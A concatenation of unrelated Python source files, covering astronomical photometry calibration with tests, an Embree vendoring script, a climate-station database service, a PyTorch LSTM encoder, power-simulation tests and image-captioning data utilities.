self.keywords = keywords
def __getattr__(self, name):
if self.instance is None:
self.instance = self.db(*self.args, **self.keywords)
return getattr(self.instance, name)
__default_photometry_db__ = Phot_db(photometry_db.Photometry_db)
####################################################
def main(argv = sys.argv):
###
def parse_spec(option, opt, value, parser):
key, val = value.split('=')
if not hasattr(parser.values, 'specification'):
setattr(parser.values, 'specification', {})
parser.values.specification[key] = val
###
parser = optparse.OptionParser()
parser.add_option('-c', '--cluster',
dest = 'cluster',
help = 'Cluster name',
default = None)
parser.add_option('-o', '--offsets',
dest = 'offsetfile',
help = 'Name of offset file',
metavar = 'FILE',
default = None)
parser.add_option('-i', '--input',
dest = 'inputfile',
help = 'Name of catalog which was calibrated',
metavar = 'FILE',
default = None)
parser.add_option('-s', '--spec', dest='specification',
action='callback',
type= 'string',
help='key=val set determines the uniqueness of this calibration',
default = {},
metavar = 'key=val',
callback = parse_spec)
parser.add_option('--fluxtype',
dest = 'fluxtype',
help = 'Flux Type to pull from ZPS table',
default = 'APER')
options, args = parser.parse_args(argv)
if options.cluster is None:
parser.error('Please specify cluster name')
if options.offsetfile is None:
parser.error('Please specify SLR offset file')
if options.inputfile is None:
parser.error('Please specify cat that SLR calibrated')
zplist = ldac.openObjectFile(options.inputfile, 'ZPS')
print ' zplist["filter"]=',zplist["filter"]
saveSlrZP(cluster = options.cluster,
offsetFile = options.offsetfile,
zplist = zplist,
fluxtype = options.fluxtype,
**options.specification)
####################################################
# User Callable Functions
####################################################
def saveSlrZP(cluster, offsetFile, zplist, photometry_db = __default_photometry_db__, fluxtype = 'APER', **specifications):
offsets = {}
input = open(offsetFile)
for line in input.readlines():
tokens = line.split()
filter = tokens[1]
zp = float(tokens[2])
zperr = float(tokens[3])
if not re.match('MAG_', filter):
filter = 'MAG_%s-%s' % (fluxtype, filter)
offsets[filter] = (zp, zperr)
filters = {}
for filter, zp in zip(zplist['filter'], zplist['zeropoints']):
if not re.match('FLUX_', filter) and not re.match('MAG_', filter):
filter = 'MAG_%s-%s' % (fluxtype, filter)
match = re.match('FLUX_(.*)', filter)
if match:
filter = 'MAG_%s' % match.group(1)
filters[filter] = zp
slr_offsets = {}
for filterkey in offsets.keys():
filter = adam_utilities.extractFullFilter(filterkey)
#adam-SHNT# problem starts here
try:
new_zp = filters[filterkey] + offsets[filterkey][0]
except KeyError:
print "filterkey=",filterkey
print "filters.keys()=",filters.keys()
print "offsets.keys()=",offsets.keys()
raise
zperr = offsets[filterkey][1]
slrZP = photometry_db.registerSlrZP(cluster, filter = filter,
zp = float(new_zp), zperr = zperr,
fitFilter = filter, **specifications)
instrument, config, chip, stdfilter = adam_utilities.parseFilter(filter)
slr_offsets[filter] = [instrument, stdfilter, slrZP]
for filterkey in filters.keys():
filter = adam_utilities.extractFullFilter(filterkey)
if filter in slr_offsets:
slr_instrument, slr_stdfilter, slrZP = slr_offsets[filter]
photometry_db.updateCalibration(cluster, filter = filter, calibration = slrZP, **specifications)
else:
instrument, config, chip, stdfilter = adam_utilities.parseFilter(filter)
for slr_filterkey, (slr_instrument, slr_stdfilter, slrZP) in slr_offsets.iteritems():
if slr_instrument == instrument and slr_stdfilter == stdfilter:
photometry_db.updateCalibration(cluster, filter = filter, calibration = slrZP, **specifications)
break
####################################################
# TESTING
####################################################
class TestingDBEntry(object):
def __init__(self, id, **fields):
self.id = id
self.fields = fields
def __getattr__(self, name):
if name in self.fields:
return self.fields[name]
raise AttributeError
###
class TestingDatabase(object):
def __init__(self):
self.reset()
###
def reset(self):
self.slr = []
self.calibrations = []
###
def registerSlrZP(self, cluster, fitFilter, zp, zperr, **specification):
entry = TestingDBEntry(len(self.slr), cluster = cluster,
fitFilter = fitFilter,
zp = zp,
zperr = zperr,
**specification)
self.slr.append(entry)
return entry
###
def updateCalibration(self, cluster, calibration, **specification):
self.calibrations.append(TestingDBEntry(len(self.calibrations), cluster = cluster, calibration = calibration, **specification))
###########
class TestSaveOffsets(unittest.TestCase):
def setUp(self):
self.db = TestingDatabase()
raw_slr_offsets = '''V SUBARU-10_2-1-W-J-V 0.039 0.0043
MPu MEGAPRIME-0-1-u 0.195374 0.016295
WHTB WHT-0-1-B 0.516663 0.0217352
'''
self.filternames = [ line.split()[1] for line in raw_slr_offsets.splitlines() ]
self.orig_zps = np.random.uniform(-4, 4, size=3) + 27.
class ZP(object):
def __init__(self, filter, zp, zperr):
self.filter = filter
self.zp = zp
self.zperr = zperr
self.slr_zps = {}
for i, line in enumerate(raw_slr_offsets.splitlines()):
tokens = line.split()
filter = tokens[1]
offset = float(tokens[2])
zperr = float(tokens[3])
self.slr_zps[filter] = ZP(filter, self.orig_zps[i] + offset, zperr)
self.offsetFile = 'test_save_slr.offsets'
output = open(self.offsetFile, 'w')
output.write(raw_slr_offsets)
output.close()
#######
def tearDown(self):
if os.path.exists(self.offsetFile):
os.remove(self.offsetFile)
#######
def testSaveOffsetsforSLR(self):
zplist = ldac.LDACCat(pyfits.new_table(pyfits.ColDefs([pyfits.Column(name = 'filter', format='20A',
array = self.filternames),
pyfits.Column(name = 'zeropoints', format='E',
array = self.orig_zps)])))
saveSlrZP(cluster = 'testcluster', offsetFile = self.offsetFile,
zplist = zplist, fluxtype = 'iso', myspec = 'custom',
photometry_db = self.db)
self.assertEquals(len(self.db.slr), 3)
self.assertEquals(sorted([slr.fitFilter for slr in self.db.slr]), sorted(self.slr_zps.keys()))
for slr in self.db.slr:
match = self.slr_zps[slr.fitFilter]
self.assertEquals(slr.cluster, 'testcluster')
self.assertEquals(slr.fitFilter, match.filter)
self.assertTrue(np.abs(slr.zp - match.zp) < 0.001)
self.assertTrue(np.abs(slr.zperr - match.zperr) < 0.001)
self.assertEquals(slr.fluxtype, 'iso')
self.assertEquals(slr.myspec, 'custom')
#######
def testTransferOffsets(self):
transferFilters = 'SUBARU-9-2-W-J-V SUBARU-10_1-1-W-J-V MEGAPRIME-0-1-g'.split()
transfer_orig_zps = [23.4, 25.3, 22.4]
correspondingFilters = {'SUBARU-9-2-W-J-V' : 'SUBARU-10_2-1-W-J-V',
'SUBARU-10_1-1-W-J-V' : 'SUBARU-10_2-1-W-J-V',
'MEGAPRIME-0-1-g' : None}
filternames = self.filternames + transferFilters
orig_zps = self.orig_zps.tolist() + transfer_orig_zps
zplist = ldac.LDACCat(pyfits.new_table(pyfits.ColDefs([pyfits.Column(name = 'filter', format='20A',
array = filternames),
pyfits.Column(name = 'zeropoints', format='E',
array = orig_zps)])))
saveSlrZP(cluster = 'testcluster', offsetFile = self.offsetFile,
zplist = zplist, fluxtype = 'iso', myspec = 'custom',
photometry_db = self.db)
for filter in filternames:
correspondingFilter = filter
if filter in correspondingFilters:
correspondingFilter = correspondingFilters[filter]
if correspondingFilter is not None:
slrmatch = None
for slr in self.db.slr:
if correspondingFilter == slr.fitFilter:
slrmatch = slr
break
self.assertTrue(slrmatch is not None)
calibmatch = None
for calib in self.db.calibrations:
if filter == calib.filter:
calibmatch = calib
break
self.assertTrue(calibmatch is not None)
self.assertEquals(calibmatch.cluster, 'testcluster')
self.assertEquals(calibmatch.filter, filter)
self.assertEquals(calibmatch.fluxtype, 'iso')
self.assertEquals(calibmatch.myspec, 'custom')
self.assertEquals(calibmatch.calibration, slrmatch)
#################
def test():
testcases = [TestSaveOffsets]
suite = unittest.TestSuite(map(unittest.TestLoader().loadTestsFromTestCase,
testcases))
unittest.TextTestRunner(verbosity=2).run(suite)
################################
### COMMAND LINE EXECUTABLE
################################
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == 'test':
test()
else:
main()
|
import glob, os, shutil, subprocess, re
include_dirs = [
"common/tasking",
"kernels/bvh",
"kernels/builders",
"common/sys",
"kernels",
"kernels/common",
"common/math",
"common/algorithms",
"common/lexers",
"common/simd",
"common/simd/arm",
"include/embree3",
"kernels/subdiv",
"kernels/geometry",
]
cpp_files = [
"common/sys/sysinfo.cpp",
"common/sys/alloc.cpp",
"common/sys/filename.cpp",
"common/sys/library.cpp",
"common/sys/thread.cpp",
"common/sys/string.cpp",
"common/sys/regression.cpp",
"common/sys/mutex.cpp",
"common/sys/condition.cpp",
"common/sys/barrier.cpp",
"common/math/constants.cpp",
"common/simd/sse.cpp",
"common/lexers/stringstream.cpp",
"common/lexers/tokenstream.cpp",
"common/tasking/taskschedulerinternal.cpp",
"kernels/common/device.cpp",
"kernels/common/stat.cpp",
"kernels/common/acceln.cpp",
"kernels/common/accelset.cpp",
"kernels/common/state.cpp",
"kernels/common/rtcore.cpp",
"kernels/common/rtcore_builder.cpp",
"kernels/common/scene.cpp",
"kernels/common/alloc.cpp",
"kernels/common/geometry.cpp",
"kernels/common/scene_triangle_mesh.cpp",
"kernels/geometry/primitive4.cpp",
"kernels/builders/primrefgen.cpp",
"kernels/bvh/bvh.cpp",
"kernels/bvh/bvh_statistics.cpp",
"kernels/bvh/bvh4_factory.cpp",
"kernels/bvh/bvh8_factory.cpp",
"kernels/bvh/bvh_collider.cpp",
"kernels/bvh/bvh_rotate.cpp",
"kernels/bvh/bvh_refit.cpp",
"kernels/bvh/bvh_builder.cpp",
"kernels/bvh/bvh_builder_morton.cpp",
"kernels/bvh/bvh_builder_sah.cpp",
"kernels/bvh/bvh_builder_sah_spatial.cpp",
"kernels/bvh/bvh_builder_sah_mb.cpp",
"kernels/bvh/bvh_builder_twolevel.cpp",
"kernels/bvh/bvh_intersector1.cpp",
"kernels/bvh/bvh_intersector1_bvh4.cpp",
]
os.chdir("../../thirdparty")
dir_name = "embree"
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
subprocess.run(["git", "clone", "https://github.com/embree/embree.git", "embree-tmp"])
os.chdir("embree-tmp")
commit_hash = str(subprocess.check_output(["git", "rev-parse", "HEAD"], universal_newlines=True)).strip()
all_files = set(cpp_files)
dest_dir = os.path.join("..", dir_name)
for include_dir in include_dirs:
headers = glob.iglob(os.path.join(include_dir, "*.h"))
all_files.update(headers)
for f in all_files:
d = os.path.join(dest_dir, os.path.dirname(f))
if not os.path.exists(d):
os.makedirs(d)
shutil.copy2(f, d)
with open(os.path.join(dest_dir, "kernels/hash.h"), "w") as hash_file:
hash_file.write(
f"""
// Copyright 2009-2020 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
#define RTC_HASH "{commit_hash}"
"""
)
with open(os.path.join(dest_dir, "kernels/config.h"), "w") as config_file:
config_file.write(
"""
// Copyright 2009-2020 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
/* #undef EMBREE_RAY_MASK */
/* #undef EMBREE_STAT_COUNTERS */
/* #undef EMBREE_BACKFACE_CULLING */
/* #undef EMBREE_BACKFACE_CULLING_CURVES */
#define EMBREE_FILTER_FUNCTION
/* #undef EMBREE_IGNORE_INVALID_RAYS */
#define EMBREE_GEOMETRY_TRIANGLE
/* #undef EMBREE_GEOMETRY_QUAD */
/* #undef EMBREE_GEOMETRY_CURVE */
/* #undef EMBREE_GEOMETRY_SUBDIVISION */
/* #undef EMBREE_GEOMETRY_USER */
/* #undef EMBREE_GEOMETRY_INSTANCE */
/* #undef EMBREE_GEOMETRY_GRID */
/* #undef EMBREE_GEOMETRY_POINT */
/* #undef EMBREE_RAY_PACKETS */
/* #undef EMBREE_COMPACT_POLYS */
#define EMBREE_CURVE_SELF_INTERSECTION_AVOIDANCE_FACTOR 2.0
#if defined(EMBREE_GEOMETRY_TRIANGLE)
#define IF_ENABLED_TRIS(x) x
#else
#define IF_ENABLED_TRIS(x)
#endif
#if defined(EMBREE_GEOMETRY_QUAD)
#define IF_ENABLED_QUADS(x) x
#else
#define IF_ENABLED_QUADS(x)
#endif
#if defined(EMBREE_GEOMETRY_CURVE) || defined(EMBREE_GEOMETRY_POINT)
#define IF_ENABLED_CURVES_OR_POINTS(x) x
#else
#define IF_ENABLED_CURVES_OR_POINTS(x)
#endif
#if defined(EMBREE_GEOMETRY_CURVE)
#define IF_ENABLED_CURVES(x) x
#else
#define IF_ENABLED_CURVES(x)
#endif
#if defined(EMBREE_GEOMETRY_POINT)
#define IF_ENABLED_POINTS(x) x
#else
#define IF_ENABLED_POINTS(x)
#endif
#if defined(EMBREE_GEOMETRY_SUBDIVISION)
#define IF_ENABLED_SUBDIV(x) x
#else
#define IF_ENABLED_SUBDIV(x)
#endif
#if defined(EMBREE_GEOMETRY_USER)
#define IF_ENABLED_USER(x) x
#else
#define IF_ENABLED_USER(x)
#endif
#if defined(EMBREE_GEOMETRY_INSTANCE)
#define IF_ENABLED_INSTANCE(x) x
#else
#define IF_ENABLED_INSTANCE(x)
#endif
#if defined(EMBREE_GEOMETRY_GRID)
#define IF_ENABLED_GRIDS(x) x
#else
#define IF_ENABLED_GRIDS(x)
#endif
"""
)
with open("CMakeLists.txt", "r") as cmake_file:
cmake_content = cmake_file.read()
major_version = int(re.compile(r"EMBREE_VERSION_MAJOR\s(\d+)").findall(cmake_content)[0])
minor_version = int(re.compile(r"EMBREE_VERSION_MINOR\s(\d+)").findall(cmake_content)[0])
patch_version = int(re.compile(r"EMBREE_VERSION_PATCH\s(\d+)").findall(cmake_content)[0])
with open(os.path.join(dest_dir, "include/embree3/rtcore_config.h"), "w") as config_file:
config_file.write(
f"""
// Copyright 2009-2021 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
#pragma once
#define RTC_VERSION_MAJOR {major_version}
#define RTC_VERSION_MINOR {minor_version}
#define RTC_VERSION_PATCH {patch_version}
#define RTC_VERSION {major_version}{minor_version:02d}{patch_version:02d}
#define RTC_VERSION_STRING "{major_version}.{minor_version}.{patch_version}"
#define RTC_MAX_INSTANCE_LEVEL_COUNT 1
#define EMBREE_MIN_WIDTH 0
#define RTC_MIN_WIDTH EMBREE_MIN_WIDTH
#define EMBREE_STATIC_LIB
/* #undef EMBREE_API_NAMESPACE */
#if defined(EMBREE_API_NAMESPACE)
# define RTC_NAMESPACE
# define RTC_NAMESPACE_BEGIN namespace {{
# define RTC_NAMESPACE_END }}
# define RTC_NAMESPACE_USE using namespace ;
# define RTC_API_EXTERN_C
# undef EMBREE_API_NAMESPACE
#else
# define RTC_NAMESPACE_BEGIN
# define RTC_NAMESPACE_END
# define RTC_NAMESPACE_USE
# if defined(__cplusplus)
# define RTC_API_EXTERN_C extern "C"
# else
# define RTC_API_EXTERN_C
# endif
#endif
#if defined(ISPC)
# define RTC_API_IMPORT extern "C" unmasked
# define RTC_API_EXPORT extern "C" unmasked
#elif defined(EMBREE_STATIC_LIB)
# define RTC_API_IMPORT RTC_API_EXTERN_C
# define RTC_API_EXPORT RTC_API_EXTERN_C
#elif defined(_WIN32)
# define RTC_API_IMPORT RTC_API_EXTERN_C __declspec(dllimport)
# define RTC_API_EXPORT RTC_API_EXTERN_C __declspec(dllexport)
#else
# define RTC_API_IMPORT RTC_API_EXTERN_C
# define RTC_API_EXPORT RTC_API_EXTERN_C __attribute__ ((visibility ("default")))
#endif
#if defined(RTC_EXPORT_API)
# define RTC_API RTC_API_EXPORT
#else
# define RTC_API RTC_API_IMPORT
#endif
"""
)
os.chdir("..")
shutil.rmtree("embree-tmp")
|
<reponame>opencdms/opencdms-api<filename>src/apps/climsoft/services/station_service.py
import logging
from typing import List
from sqlalchemy.orm.session import Session
from opencdms.models.climsoft import v4_1_1_core as models
from apps.climsoft.schemas import station_schema
from fastapi.exceptions import HTTPException
logger = logging.getLogger("ClimsoftStationService")
logging.basicConfig(level=logging.INFO)
class FailedCreatingStation(Exception):
pass
class FailedGettingStation(Exception):
pass
class FailedGettingStationList(Exception):
pass
class FailedUpdatingStation(Exception):
pass
class FailedDeletingStation(Exception):
pass
class StationDoesNotExist(Exception):
pass
def create(db_session: Session, data: station_schema.CreateStation) -> station_schema.Station:
try:
station = models.Station(**data.dict())
db_session.add(station)
db_session.commit()
return station_schema.Station.from_orm(station)
except Exception as e:
db_session.rollback()
logger.exception(e)
raise FailedCreatingStation("Failed creating station.")
def get(db_session: Session, station_id: str) -> station_schema.Station:
try:
station = db_session.query(models.Station).filter_by(stationId=station_id).first()
if not station:
raise HTTPException(status_code=404, detail="Station does not exist.")
return station_schema.Station.from_orm(station)
except HTTPException:
raise
except Exception as e:
logger.exception(e)
raise FailedGettingStation("Failed getting station.")
def query(
db_session: Session,
station_id: str = None,
station_name: str = None,
wmoid: str = None,
icaoid: str = None,
latitude: float = None,
longitude: float = None,
qualifier: str = None,
elevation: str = None,
geolocation_method: str = None,
geolocation_accuracy: str = None,
opening_datetime: str = None,
closing_datetime: str = None,
country: str = None,
authority: str = None,
admin_region: str = None,
drainage_basin: str = None,
waca_selection: bool = None,
cpt_selection: bool = None,
station_operational: bool = None,
limit: int = 25,
offset: int = 0
) -> List[station_schema.Station]:
"""
This function builds a query based on the given parameter and returns `limit` numbers of `obselement` row skipping
`offset` number of rows
:param db_session: sqlalchemy database session
:param station_id: compares with `stationId` for an exact match
:param station_name: compares with `stationName` for an exact match
:param wmoid: compares with `wmoid` for an exact match
:param icaoid: compares with `icaoid` for an exact match
:param latitude: return items with greater or equal latitude
:param longitude: return items with greater or equal longitude
:param qualifier: checks if qualifier column contains given input
:param elevation: checks if elevation column contains given input
:param geolocation_method: checks if geolocation method column contains given input
:param geolocation_accuracy: return items with greater or equal geolocation accuracy
:param opening_datetime: return items with greater or equal for `openingDatetime` column
:param closing_datetime: return items with smaller or equal for `closingDatetime` column
:param country: compares with `country` for an exact match
:param authority: compares with `authority` for an exact match
:param admin_region: compares with `adminRegion` for an exact match
:param drainage_basin: compares with `drainageBasin` for an exact match
:param waca_selection: compares with `wacaSelection` for an exact match
:param cpt_selection: compares with `cptSelection` for an exact match
:param station_operational: compares with `stationOperational` for an exact match
:param limit: describes page size
:param offset: describe how many to skip
:return: list of `obselement`
"""
try:
q = db_session.query(models.Station)
if station_id is not None:
q = q.filter_by(stationId=station_id)
if station_name is not None:
q = q.filter_by(stationName=station_name)
if wmoid is not None:
q = q.filter_by(wmoid=wmoid)
if icaoid is not None:
q = q.filter_by(icaoid=icaoid)
if latitude is not None:
q = q.filter(models.Station.latitude >= latitude)
if longitude is not None:
q = q.filter(models.Station.longitude >= longitude)
if qualifier is not None:
q = q.filter(models.Station.qualifier.ilike(f"%{qualifier}%"))
if elevation is not None:
q = q.filter(models.Station.elevation.ilike(f"%{elevation}%"))
if geolocation_accuracy is not None:
q = q.filter(models.Station.geoLocationAccuracy >= geolocation_accuracy)
if geolocation_method is not None:
q = q.filter(models.Station.geoLocationMethod.ilike(f"%{geolocation_method}%"))
if opening_datetime is not None:
q = q.filter(models.Station.openingDatetime >= opening_datetime)
if closing_datetime is not None:
q = q.filter(models.Station.closingDatetime <= closing_datetime)
if country is not None:
q = q.filter_by(contry=country)
if authority is not None:
q = q.filter_by(authority=authority)
if admin_region is not None:
q = q.filter_by(adminRegion=admin_region)
if drainage_basin is not None:
q = q.filter_by(drainageBasin=drainage_basin)
if waca_selection is not None:
q = q.filter_by(wacaSelection=waca_selection)
if cpt_selection is not None:
q = q.filter_by(cptSelection=waca_selection)
if station_operational is not None:
q = q.filter_by(stationOperational=waca_selection)
return [station_schema.Station.from_orm(s) for s in q.offset(offset).limit(limit).all()]
except Exception as e:
logger.exception(e)
raise FailedGettingStationList("Failed getting station list.")
def update(db_session: Session, station_id: str, updates: station_schema.UpdateStation) -> station_schema.Station:
try:
db_session.query(models.Station).filter_by(stationId=station_id).update(updates.dict())
db_session.commit()
updated_station = db_session.query(models.Station).filter_by(stationId=station_id).first()
return station_schema.Station.from_orm(updated_station)
except Exception as e:
db_session.rollback()
logger.exception(e)
raise FailedUpdatingStation("Failed updating station")
def delete(db_session: Session, station_id: str) -> bool:
try:
db_session.query(models.Station).filter_by(stationId=station_id).delete()
db_session.commit()
return True
except Exception as e:
db_session.rollback()
logger.exception(e)
raise FailedDeletingStation("Failed deleting station.")
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
from copy import deepcopy
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence
class ContextEncoder(nn.Module):
"""Sinal directional LSTM network, encoding pre- and pos-context.
"""
def __init__(self,
input_size,
hidden_size,
wordEmbed,
drop_out=0.1,
pack_sequence=True):
"""Initialize Context Encoder
Args:
input_size: input embedding size.
hidden_size: LSTM hidden size.
wordEmbed: nn.Module, embedding layer.
"""
super(ContextEncoder, self).__init__()
self.word_embed = wordEmbed # embedding layer
self.pack_sequence = pack_sequence
self.pre_rnn = nn.LSTM(input_size,
hidden_size,
batch_first=True,
bidirectional=True)
self.pos_rnn = deepcopy(self.pre_rnn)
self.output_cproj = nn.Linear(hidden_size*4, hidden_size)
self.output_hproj = deepcopy(self.output_cproj)
self.tanh = nn.Tanh()
self.dropout = nn.Dropout(p=drop_out)
def _encode(self, inputs, seq_lens=None):
"""
Args:
inputs: [batch, seq_len, embedding_dim]
seq_lens: [batch]
"""
if seq_lens is not None and self.pack_sequence:
# sort inputs by sequence length
lens_sorted, idx_sort = torch.sort(seq_lens, dim=0, descending=True)
_, idx_unsort = torch.sort(idx_sort, dim=0)
inputs = inputs.index_select(0, idx_sort)
inputs = pack_padded_sequence(inputs, lens_sorted, batch_first=True)
# (h, c): ([2, batch_size, hidden], [2, batch_size, hidden])
_, (h, c) = self.pre_rnn(inputs)
# restore order
h, c = torch.cat((h[0], h[1]), -1), torch.cat((c[0], c[1]), -1)
h, c = h.index_select(0, idx_unsort), c.index_select(0, idx_unsort)
return h, c
def forward(self, _pre, _pos):
"""Encoding context sequences.
Args:
_pre: (prec_word_ids, prec_seq_lens, prec_char_ids, prec_word_lens)
_pos: (posc_word_ids, posc_seq_lens, posc_char_ids, posc_word_lens)
"""
prec_word_ids, prec_seq_lens, prec_char_ids, prec_word_lens = _pre
posc_word_ids, posc_seq_lens, posc_char_ids, posc_word_lens = _pos
# [batch, max_seq_len, word_dim + char_hidden]
embed_pre = self.word_embed(prec_word_ids, prec_char_ids, prec_word_lens)
embed_pos = self.word_embed(posc_word_ids, posc_char_ids, posc_word_lens)
pre_h, pre_c = self._encode(embed_pre, prec_seq_lens)
pos_h, pos_c = self._encode(embed_pos, posc_seq_lens)
# final_hidd_proj/final_cell_proj: [batch_size, hidden]
h_cat = self.tanh(self.output_hproj(torch.cat((pre_h, pos_h), 1)))
c_cat = self.tanh(self.output_cproj(torch.cat((pre_c, pos_c), 1)))
h_cat, c_cat = self.dropout(h_cat), self.dropout(c_cat)
return h_cat, c_cat
|
"""Tests local execution of a snapshot simulation."""
import os
import shutil
import pandas as pd
import pytest
from jade.result import ResultsSummary
from jade.utils.subprocess_manager import run_command
from disco.extensions.pydss_simulation.pydss_configuration import PyDssConfiguration
from disco.extensions.pydss_simulation.pydss_inputs import PyDssInputs
from disco.extensions.pydss_simulation.pydss_simulation import PyDssSimulation
from disco.pydss.pydss_analysis import PyDssAnalysis
from tests.common import *
def test_pydss_simulation(cleanup):
if "NREL_CLUSTER" in os.environ:
os.environ.pop("NREL_CLUSTER")
os.environ["FAKE_HPC_CLUSTER"] = "True"
num_jobs = 4
defaults_cmd = f"{TRANSFORM_DEFAULTS} tests/data/smart-ds SnapshotImpactAnalysis -c {TRANSFORM_CONFIG}"
transform_cmd = f"{TRANSFORM_JOBS} {TRANSFORM_CONFIG} -f -o {MODELS_DIR}"
config_cmd = f"{CONFIG_JOBS} snapshot-impact-analysis {MODELS_DIR} -c {CONFIG_FILE}"
submit_cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -p 1"
assert run_command(defaults_cmd) == 0
assert run_command(transform_cmd) == 0
assert run_command(config_cmd) == 0
assert run_command(submit_cmd) == 0
verify_results(OUTPUT, num_jobs)
config = PyDssConfiguration.deserialize(CONFIG_FILE)
analysis = PyDssAnalysis(OUTPUT, config)
result = analysis.list_results()[0]
pydss_results = analysis.read_results(result.name)
assert len(pydss_results.scenarios) == 1
scenario = pydss_results.scenarios[0]
lines = scenario.list_element_names("Lines", "Currents")
df = scenario.get_dataframe("Lines", "Currents", lines[0])
assert isinstance(df, pd.DataFrame)
assert len(df) == 1
element_info_files = scenario.list_element_info_files()
assert element_info_files
transformer_warehouse = scenario.read_element_info_file("TransformersPhase")
assert isinstance(transformer_warehouse, pd.DataFrame)
assert len(transformer_warehouse) > 0
# TODO: the test circuit doesn't current produce anything
capacitor_changes = scenario.read_capacitor_changes()
#assert capacitor_changes
event_log = scenario.read_event_log()
#assert event_log
def verify_results(output_dir, num_jobs):
result_summary = ResultsSummary(output_dir)
results = result_summary.list_results()
assert len(results) == num_jobs
for result in results:
assert result.status == "finished"
assert result.return_code == 0
def test_recalculate_kva(cleanup):
defaults_cmd = f"{TRANSFORM_DEFAULTS} tests/data/smart-ds SnapshotImpactAnalysis -c {TRANSFORM_CONFIG}"
transform_cmd = f"{TRANSFORM_JOBS} {TRANSFORM_CONFIG} -f -o {MODELS_DIR}"
assert run_command(defaults_cmd) == 0
assert run_command(transform_cmd) == 0
inputs = PyDssInputs(MODELS_DIR)
key = inputs.list_keys()[0]
config = PyDssConfiguration(inputs)
job = config.inputs.get_job(key)
config.add_job(job)
simulation = PyDssSimulation.create(config.pydss_inputs,
job,
output="output")
assert simulation._model.deployment.dc_ac_ratio == 1.15
assert simulation._model.deployment.kva_to_kw_rating == 1.0
irradiance_scaling_factor = 100
# pctPmpp = irradiance_scaling_factor/DC-AC ratio
# kVA = (Pmpp/DC-AC ratio)*(kVA_to_kW rating)
for add_pct_pmpp in (True, False):
simulation._add_pct_pmpp = add_pct_pmpp
pmpp = 54.440229732964184
line = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 phases=2 " \
"kV=0.20784609690826525 kVA=59.884252706260604 " \
f"Pmpp={pmpp} conn=wye irradiance=1 yearly=test"
pct_pmpp = irradiance_scaling_factor / 1.15
kva = pmpp / simulation._model.deployment.dc_ac_ratio * \
simulation._model.deployment.kva_to_kw_rating
expected = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 " \
f"phases=2 kV=0.20784609690826525 kVA={kva} " \
f"Pmpp={pmpp} conn=wye irradiance=1 yearly=test"
if add_pct_pmpp:
expected += f" pctPmpp={pct_pmpp}"
actual = simulation._recalculate_kva(line)
assert actual == expected + "\n"
# Add pctPmpp as an existing bad value and ensure it gets fixed.
line = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 phases=2 " \
"kV=0.20784609690826525 kVA=59.884252706260604 " \
f"Pmpp={pmpp} pctPmpp=99999 conn=wye irradiance=1 " \
"yearly=test"
expected = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 " \
f"phases=2 kV=0.20784609690826525 kVA={kva} " \
f"Pmpp={pmpp} pctPmpp={pct_pmpp} conn=wye irradiance=1 " \
"yearly=test"
actual = simulation._recalculate_kva(line)
assert actual == expected + "\n"
|
<reponame>pskrunner14/descriptor
""" Data Utility Module for Image Captioning CRNN model. """
import os
import json
import collections
import multiprocessing as mp
import numpy as np
import cv2
from tqdm import tqdm
import torch
import torchvision as vision
import torchtext as text
from descriptor.models.cnn_encoder import get_cnn_encoder, encode
from keras.applications.inception_v3 import preprocess_input
SPECIAL_TOKENS = ['<UNK>', '<PAD>', '<SOS>', '<EOS>']
def get_captions(json_file_path, filenames):
""" Get captions for given filenames.
Args:
json_file_path (string): Path to the json file containing annotations/captions.
filenames (list): List with all the filenames.
"""
with open(json_file_path, "r") as file:
data = json.load(file)
# dict(image_idx: image_file_name)
id_to_filename = {img['id']: img['file_name'] for img in data['images']}
# defualtdict(new_key: [])
filenames_to_captions = collections.defaultdict(list)
# add captions corresponding to image under image_id in dict
for caption in data['annotations']:
filenames_to_captions[id_to_filename[caption['image_id']]].append(caption['caption'])
filenames_to_captions = dict(filenames_to_captions)
# create a list of list of captions so we can access by idx
return list(map(lambda x: filenames_to_captions[x], filenames))
def load_vocab(name='6B', dim=300):
"""Loads a pretrained GloVe word embeddings model.
Args:
-----
name (str): name of the GloVe model.
dim (int): dimension of the word vector.
Returns:
--------
torchtext.vocab.GloVe: the pretrained GloVe word embeddings model.
"""
vocab = text.vocab.GloVe(name=name, dim=dim)
print(f'Loaded {len(vocab.itos)} {vocab.dim}-dimensional word vectors!')
vocab.itos = SPECIAL_TOKENS + vocab.itos
del vocab.stoi
vocab.stoi = {}
for i, word in enumerate(vocab.itos):
vocab.stoi[word] = i
print(f'Adding special tokens to the vocab: {SPECIAL_TOKENS}')
special_token_tensors = torch.zeros(len(SPECIAL_TOKENS), vocab.dim)
vocab.vectors = torch.cat(tensors=(special_token_tensors, vocab.vectors))
print(vocab.itos[:5])
print(vocab.vectors.size())
return vocab
def seq_to_tensor(sequence, word2idx, max_len=20):
"""Casts a text sequence into rnn-digestable padded tensor.
Args:
-----
sequence (str): the input text sequence.
word2idx (dict): the mapping from word to index.
max_len (int): maximum rnn-digestable length of the sequence.
Returns:
--------
torch.Tensor: the output tensor of token ids.
"""
seq_idx = torch.LongTensor([word2idx['<SOS>']] + [word2idx[token] \
if token in word2idx else word2idx['<UNK>'] \
for token in sequence.lower().split(' ')])
seq_idx = seq_idx[: max_len] if len(seq_idx) < max_len else seq_idx[: max_len - 1]
seq_idx = torch.cat(tensors=(seq_idx, torch.LongTensor([word2idx['<EOS>']])))
seq_idx = torch.cat(tensors=(seq_idx, torch.LongTensor([word2idx['<PAD>']] \
* (max_len - len(seq_idx)))))
return seq_idx
class Image2TensorDataset(torch.utils.data.Dataset):
"""
"""
def __init__(self, root_dir='data/train2014'):
self.__root_dir = root_dir
self.__image_paths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(root_dir)))
self.__transform = vision.transforms.Compose([
vision.transforms.ToTensor()
])
def __len__(self):
return len(self.__image_paths)
def __getitem__(self, idx):
file_name = self.__image_paths[idx]
img = cv2.imread(f'{self.__root_dir}/{file_name}')
img = image_center_crop(img)
